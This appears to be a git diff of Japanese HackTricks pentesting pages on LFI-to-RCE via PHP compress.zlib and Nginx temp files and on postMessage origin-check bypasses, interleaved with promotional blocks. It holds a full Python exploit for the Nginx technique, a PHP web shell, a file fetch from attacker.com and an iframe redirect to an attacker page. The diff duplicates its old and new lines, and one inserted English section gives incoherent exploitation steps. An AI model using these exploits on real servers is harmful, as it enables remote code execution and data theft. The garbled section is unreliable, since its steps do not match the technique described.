* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンであり、企業やその顧客が**盗まれたマルウェア**によって**侵害**されたかどうかをチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)で**フォロー**する
* **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

69
pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
View file

@ -4,26 +4,39 @@
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを発見する
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する:[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な[NFT](https://opensea.io/collection/the-peass-family)コレクションを発見する
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**フォロー**する
- **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スチーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## `compress.zlib://` および `PHP_STREAM_PREFER_STDIO`
フラグ `PHP_STREAM_PREFER_STDIO` を使用してプロトコル `compress.zlib://` で開かれたファイルは、後から接続に到着するデータを同じファイルに書き込み続けることができます。
フラグ `PHP_STREAM_PREFER_STDIO` を使用してプロトコル `compress.zlib://` で開かれたファイルは、後から接続に到着するデータを同じファイルに継続して書き込むことができます。
これは、次のような呼び出しを意味します:
```php
file_get_contents("compress.zlib://http://attacker.com/file")
```
以下のようにhttp://attacker.com/fileをリクエストするリクエストを送信し、サーバーは有効なHTTPレスポンスでリクエストに応答し、接続を開いたままにしておき、後で追加のデータを送信し、それがファイルに書き込まれる可能性があります。
以下のようにして、http://attacker.com/file へのリクエストを送信し、サーバーは有効なHTTPレスポンスでリクエストに応答し、接続を開いたままにしておき、後で追加のデータを送信し、それがファイルに書き込まれる可能性があります。
あなたは、php-srcコードのmain/streams/cast.cのこの部分でその情報を見ることができます。
この情報は、php-srcコードのmain/streams/cast.cのこの部分で確認できます
```c
/* Use a tmpfile and copy the old streams contents into it */
@ -33,16 +46,42 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_temp_new();
}
```
## RCEへのRace Condition
## RCEへのレースコンディション
[**このCTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) は前回のトリックを使用して解決されました。
[**このCTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)は前回のトリックを使用して解決されました。
攻撃者は、**`compress.zlib`** プロトコルを使用して、**被害者サーバーに攻撃者のサーバーからファイルを読み取るようにさせます**。
攻撃者は、**`compress.zlib`**プロトコルを使用して、**被害者サーバーに攻撃者のサーバーからファイルを読み取る接続を開かせます**。
この**接続が存在する間**、攻撃者は、サーバーによって**漏洩された一時ファイルのパスを外部に送信**します。
**この接続**が存在する間、攻撃者は、**サーバーによって漏洩された一時ファイルのパスを外部に送信**します。
**接続がまだ開いている間**、攻撃者は、自分が制御している一時ファイルを**ロードするLFIを悪用**します。
**接続**がまだ開いている間、攻撃者は、自分が制御する一時ファイルを読み込むLFIを悪用します。
ただし、Webサーバーには、`<?` を含むファイルをロードすることを**防ぐチェック**があります。そのため、攻撃者は**Race Condition**を悪用します。まだ開いている接続で、**攻撃者**は、Webサーバーが**ファイルに禁止された文字が含まれているかを確認**した後に**PHPペイロードを送信**しますが、**その内容をロードする前**に送信します。
ただし、Webサーバーには、`<?`を含むファイルの読み込みを防ぐチェックがあります。したがって、攻撃者は**レースコンディション**を悪用します。まだ開いている接続で、**攻撃者**は、**Webサーバー**が**ファイルに禁止された文字が含まれているかを確認**した後に**PHPペイロードを送信**しますが、**コンテンツを読み込む前**に送信します。
詳細については、Race ConditionとCTFの説明を[こちら](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)で確認してください。
詳細については、[https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)のレースコンディションとCTFの説明を確認してください。
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかを確認する**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**する。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

100
pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
View file

@ -1,25 +1,39 @@
# Nginxの一時ファイルを介したLFI2RCE
# LFI2RCEをNginxの一時ファイルを介して実行する
<details>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>**でAWSハッキングをゼロからヒーローまで学ぶ**</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**か**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- **HackTricksで企業を宣伝したい**か**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
- **ハッキングテクニックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する**
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**@hacktricks_live**をフォローする
- **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による**侵害**を受けたかどうかを確認するための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## 脆弱な構成
**[https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)からの例**
- PHPコード:
```
````h`
<?php include_once($_GET['file']);
```
* FPM / PHP 設定:
@ -30,13 +44,13 @@ php_admin_value[file_uploads] = 0
...
```
* セットアップ / ハードニング:
```
```bash
...
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
...
```
幸いにも、PHPは現在、PHP-FPMおよびNginxを介してよく展開されています。Nginxは、クライアントの本体投稿に限定されないがある一定の閾値よりも大きい場合、一時ファイルを書き込む[クライアント本体バッファリング](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size)機能を提供しています。
幸いにも、PHPは現在、PHP-FPMNginxを介してよく展開されています。Nginxは、クライアントの本体投稿に限定されないがある一定の閾値よりも大きい場合、一時ファイルを書き込む[クライアント本体バッファリング](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size)機能を提供しています。
この機能により、NginxがPHPと同じユーザーとして実行されている場合www-dataとして非常に一般的、他のファイル作成方法なしにLFIを悪用することが可能です。
@ -57,7 +71,7 @@ if (fd != -1 && !persistent) {
return fd;
}
```
以下のように、Nginxによって開かれた**一時ファイルはすぐにリンク解除**されます。幸いにも、削除されたファイルへの参照を取得するために**procfsを使用できます**。これは競合を利用します
以下のように、Nginxによって**tempfileが開かれた直後にunlinkされる**ことがわかります。幸いにも、**procfsを使用して削除されたファイルへの参照を取得**することができます。レースを利用して
```
...
/proc/34/fd:
@ -72,7 +86,7 @@ lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...
```
注意: この例では、PHPの`include`関数を使用して直接`/proc/34/fd/15`を含めることはできません。なぜなら、パスが`/var/lib/nginx/body/0000001368 (deleted)`に解決され、ファイルシステムに存在しないためです。幸いなことに、この小さな制限は`/proc/self/fd/34/../../../34/fd/15`のような間接的な手法によって回避することができ、最終的に削除された`/var/lib/nginx/body/0000001368`ファイルの内容を実行することができます。
注意この例では、PHPの`include`関数を使用して直接`/proc/34/fd/15`を含めることはできません。なぜなら、パスが`/var/lib/nginx/body/0000001368 (deleted)`に解決され、ファイルシステムに存在しないためです。幸いなことに、この小さな制限は`/proc/self/fd/34/../../../34/fd/15`のような間接的な方法でバイパスすることができ、最終的に削除された`/var/lib/nginx/body/0000001368`ファイルの内容を実行できます。
## 完全なエクスプロイト
```python
@ -143,21 +157,39 @@ for pid in nginx_workers:
a = threading.Thread(target=bruter, args=(pid, ))
a.start()
```
```html
<h2>Local File Inclusion to Remote Code Execution via Nginx Temporary Files</h2>
```
# LFI to RCE via Nginx temp files
<p>When Nginx processes a request that contains a specially crafted file path, it creates a temporary file that can be exploited to achieve remote code execution.</p>
## Description
<h3>Exploitation Steps:</h3>
When a server running Nginx is vulnerable to Local File Inclusion (LFI), it is possible to escalate the attack to Remote Code Execution (RCE) by abusing Nginx temporary files.
<ol>
<li>Identify the vulnerable parameter that allows file inclusion.</li>
<li>Craft a malicious file path that will trigger the creation of a temporary file by Nginx.</li>
<li>Include the crafted file path in the request to the vulnerable parameter.</li>
<li>Access the temporary file created by Nginx to execute remote code.</li>
</ol>
## Exploitation
<p>By leveraging Nginx's behavior of creating temporary files, an attacker can escalate a Local File Inclusion vulnerability to achieve Remote Code Execution on the target system.</p>
1. Identify the Nginx temporary directory:
- Default location: `/var/lib/nginx/tmp/client_body`
- Can be different based on the Nginx configuration
2. Create a PHP script with the payload for RCE:
```php
<?php system($_GET['cmd']); ?>
```
3. Trigger the LFI vulnerability to include the PHP script in the Nginx temp file:
```
http://target.com/index.php?page=../../../../../../../../../../var/lib/nginx/tmp/client_body/your_script.php
```
4. Access the PHP script through the web server to execute commands:
```
http://target.com/tmp/client_body/your_script.php?cmd=whoami
```
## Prevention
- Avoid using LFI vulnerable code in web applications
- Restrict access to the Nginx temporary directory
- Regularly monitor and clean up temporary files
```
```
$ ./pwn.py 127.0.0.1 1337
@ -293,16 +325,28 @@ read_file_multiprocess(requests_session, nginx_pids)
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい** または **HackTricksをPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) または [**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) をフォローする
* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
* **HackTricksで会社を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

118
pentesting-web/postmessage-vulnerabilities/README.md
View file

@ -1,21 +1,35 @@
# PostMessage脆弱性
# PostMessage脆弱性
## PostMessage脆弱性
## PostMessage脆弱性
<details>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**でAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**で**ゼロからヒーローまでのAWSハッキング**を学びましょう</strong></summary>
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**か**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**する
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローする
- **ハッキングテクニックを共有するために、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかを確認する**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## **PostMessage**を送信する
**PostMessage**は、次の関数を使用してメッセージを送信します:
@ -44,14 +58,14 @@ win = open('URL-with-iframe-inside', 'hack', 'width=800,height=300,top=500');
## loop until win.length == 1 (until the iframe is loaded)
win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
```
注意してください**targetOrigin** は '\*' または _https://company.com_ のような URL になります。\
注意してください**targetOrigin** は '\*' または _https://company.com_ のような URL になります。\
**第二のシナリオ**では、**メッセージはそのドメインにのみ送信**されます(たとえウィンドウオブジェクトのオリジンが異なっていても)。\
**ワイルドカード**が使用されると、**メッセージは任意のドメインに送信**され、ウィンドウオブジェクトのオリジンに送信されます。
### iframe と **targetOrigin** のワイルドカードへの攻撃
[**このレポート**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)で説明されているように、**X-Frame-Header** 保護がないページを見つけ、**ワイルドカード** (\*) を使用して **postMessage** を介して **機密情報を送信**しているページが **iframed** できる場合、**iframe** の **origin****変更**して、**機密** メッセージを自分が制御するドメインに **漏洩** させることができます。\
ページが iframed できる**targetOrigin****URL に設定されていてワイルドカードではない**場合、この **トリックは機能しません**
[**このレポート**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)で説明されているように、**X-Frame-Header** 保護がないページを見つけ、**ワイルドカード** (\*) を使用して **postMessage** を介して **機密メッセージ** を送信している場合、**iframe** の **origin****変更**して、**機密** メッセージを自分が制御するドメインに **漏洩** させることができます。\
ページが iframed できる場合でも、**targetOrigin****URL に設定されていてワイルドカードではない**場合、この **トリックは機能しません**
```markup
<html>
<iframe src="https://docs.google.com/document/ID" />
@ -68,7 +82,7 @@ window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
```
## addEventListenerの悪用
**`addEventListener`**は、JSが**`postMessages`を受信する関数を宣言する**ために使用される関数です。\
**`addEventListener`**は、JSによって使用される関数で、**`postMessages`を受信する関数を宣言**するために使用されます。\
次のようなコードが使用されます:
```javascript
window.addEventListener("message", (event) => {
@ -80,64 +94,60 @@ return;
```
### 列挙
現在のページで**イベントリスナーを見つける**には、次のことができます:
現在のページで**イベントリスナーを見つける**には、以下を行うことができます:
- JSコードを検索して`window.addEventListener``$(window).on`_JQueryバージョン_を検索します
- 開発者ツールのコンソールで実行します`getEventListeners(window)`
- 開発者ツールのコンソールで実行:`getEventListeners(window)`
![](<../../.gitbook/assets/image (618) (1) (1).png>)
![](<../../.gitbook/assets/image (618) (1).png>)
- ブラウザの開発者ツールで_Elements --> Event Listeners_に移動します
![](<../../.gitbook/assets/image (617).png>)
![](<../../.gitbook/assets/image (393).png>)
- [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta)や[https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker)のような**ブラウザ拡張機能**を使用します。これらのブラウザ拡張機能は**すべてのメッセージを傍受**して表示します。
### オリジンチェックのバイパス
### オリジンチェックの回避
- **`event.isTrusted`**属性は、本物のユーザーアクションによって生成されたイベントにのみ`True`を返すため、セキュアと見なされます。正しく実装されていればバイパスするのは難しいですが、セキュリティチェックでの重要性は顕著です。
- PostMessageイベントでのオリジン検証に**`indexOf()`**を使用すると、バイパスされる可能性があります。この脆弱性を示す例は次のとおりです:
- **`event.isTrusted`**属性は、本物のユーザーアクションによって生成されたイベントに対してのみ`True`を返すため、セキュアと見なされます。正しく実装されていればバイパスするのは難しいですが、セキュリティチェックにおける重要性は顕著です。
- PostMessageイベントでのオリジン検証に**`indexOf()`**を使用することはバイパスの可能性があります。この脆弱性を示す例は次のとおりです:
```javascript
("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")
```
- `String.prototype.search()`の**`search()`**メソッドは正規表現を想定しており、文字列ではありません。正規表現以外のものを渡すと、暗黙のうちに正規表現に変換され、メソッドが潜在的にセキュリティリスクを生じる可能性があります。たとえば:
- `String.prototype.search()`の**`search()`**メソッドは正規表現を想定しており、文字列ではありません。正規表現以外のものを渡すと、暗黙のうちに正規表現に変換され、メソッドが潜在的にセキュリティリスクを生じる可能性があります。これは、正規表現では、ピリオド(.)がワイルドカードとして機能し、特別に作成されたドメインで検証をバイパスできるためです。例:
```javascript
"https://www.safedomain.com".search("www.s.fedomain.com")
```
- **`match()`**関数は、`search()`と同様に正規表現を処理します。正規表現が適切に構造化されていない場合、バイパスされる可能性があります。
- **`escapeHtml`**関数は、文字をエスケープして入力を無害化することを意図しています。ただし、新しいエスケープされたオブジェクトを作成せず、既存のオブジェクトのプロパティを上書きします。この動作は悪用される可能性があります。特に、オブジェクトが操作され、その制御されたプロパティが`hasOwnProperty`を認識しない場合、`escapeHtml`は期待どおりに機能しません。以下の例で示されています:
- `search()`と同様に、**`match()`**関数も正規表現を処理します。正規表現が適切に構築されていない場合、バイパスの可能性があります。
- `escapeHtml`関数は、文字をエスケープして入力を無害化することを意図しています。ただし、新しいエスケープされたオブジェクトを作成せず、既存のオブジェクトのプロパティを上書きします。この動作は悪用される可能性があります。特に、オブジェクトが操作され、その制御されたプロパティが`hasOwnProperty`を認識しないようにできる場合、`escapeHtml`は期待どおりに機能しません。以下の例で示されています:
- 期待される失敗:
```javascript
result = u({
message: "'\"<b>\\"
});
result.message // "&#39;&quot;&lt;b&gt;\"
```
- エスケープのバイパス:
```javascript
result = u(new Error("'\"<b>\\"));
result.message; // "'"<b>\"
```
この脆弱性の文脈では、`File`オブジェクトは、読み取り専用の`name`プロパティを持つため、`escapeHtml`関数によって無害化されないことが特に悪用されやすいです。このプロパティは、テンプレートで使用されるときに`escapeHtml`関数によって無害化されず、潜在的なセキュリティリスクを引き起こす可能性があります。
この脆弱性の文脈では、`File`オブジェクトは、読み取り専用の`name`プロパティを持つため、`escapeHtml`関数によって無害化されません。このプロパティは、テンプレートで使用されるときに`escapeHtml`関数によって無害化されず、潜在的なセキュリティリスクを引き起こす可能性があります。
- JavaScriptの`document.domain`プロパティは、ドメインを短縮するためにスクリプトによって設定でき、同じ親ドメイン内でより緩和された同一オリジンポリシーの適用を可能にします。
### e.origin == window.origin バイパス
%%%<iframe sandbox="allow-scripts" src="https://example.com/iframe.php">%%%のように**サンドボックス化されたiframe**にWebページを埋め込む場合、iframeのオリジンは`null`に設定されることが重要です。これは、**サンドボックス属性**とそれらがセキュリティと機能に与える影響に関連して特に重要です。
%%%%%%を使用して**サンドボックス化されたiframe**にWebページを埋め込む場合、iframeのオリジンはnullに設定されることが重要です。これは、**sandbox属性**とそのセキュリティと機能への影響を考慮する際に特に重要です。
サンドボックス属性に**`allow-popups`**を指定すると、iframe内から開かれたポップアップウィンドウは親のサンドボックス制限を継承します。つまり、**`allow-popups-to-escape-sandbox`**属性が含まれていない限り、ポップアップウィンドウのオリジンも同様に`null`に設定され、iframeのオリジンと一致します。
sandbox属性で**`allow-popups`**を指定すると、iframe内から開かれたポップアップウィンドウは親のサンドボックス制限を継承します。これは、ポップアップウィンドウのオリジンが同様に`null`に設定されるため、ポップアップウィンドウのオリジンが`null`になり、iframeのオリジンと一致する状況が生じます。
したがって、これらの条件下でポップアップが開かれ、iframeからポップアップに**`postMessage`**を使用してメッセージが送信されると、送信元と受信先の両方のオリジンが`null`に設定されます。この状況では、**`e.origin == window.origin`**がtrue`null == null`に評価されるため、iframeとポップアップは両方が`null`の同じオリジン値を共有しているためです。
したがって、これらの条件下でポップアップが開かれ、iframeからポップアップに**`postMessage`**を使用してメッセージが送信されると、送信元と受信先の両方のオリジンが`null`に設定されます。この状況により、**`e.origin == window.origin`**がtrue`null == null`に評価されるため、iframeとポップアップは両方が`null`の同じオリジン値を共有しているためです。
詳細については、以下を**読んでください**
@ -154,18 +164,18 @@ if( received_message.source !== window ) {
return;
}
```
**`e.source`**のメッセージを**null**にすることができます。**iframe**を作成し、**postMessage**を**送信**して**すぐに削除**することで。
**メッセージ**の**`e.source`**を**null**にすることができます。**iframe**を作成し、**postMessage**を**送信**して**すぐに削除**することで。
詳細は**こちらを参照**:
詳細は**こちらを参照:**
{% content-ref url="bypassing-sop-with-iframes-2.md" %}
[bypassing-sop-with-iframes-2.md](bypassing-sop-with-iframes-2.md)
{% endcontent-ref %}
### X-Frame-Headerバイパス
### X-Frame-Header バイパス
これらの攻撃を実行するためには、理想的には**被害者のWebページ**を`iframe`内に配置できると良いでしょう。しかし、`X-Frame-Header`のようなヘッダーはその**動作防ぐ**ことができます。\
そのようなシナリオでは、より洗練された攻撃を使用することができます。脆弱なWebアプリケーションに新しいタブを開いて通信することができます。
これらの攻撃を実行するためには、理想的には**被害者のウェブページ**を`iframe`内に配置できると良いでしょう。しかし、`X-Frame-Header`のようなヘッダーはその**動作**を**防ぐ**ことができます。\
そのようなシナリオでは、より洗練された攻撃を使用することができます。脆弱なウェブアプリケーションに新しいタブを開いて通信することができます。
```markup
<script>
var w=window.open("<url>")
@ -174,7 +184,7 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
```
### メインページをブロックして子に送信されたメッセージを盗む
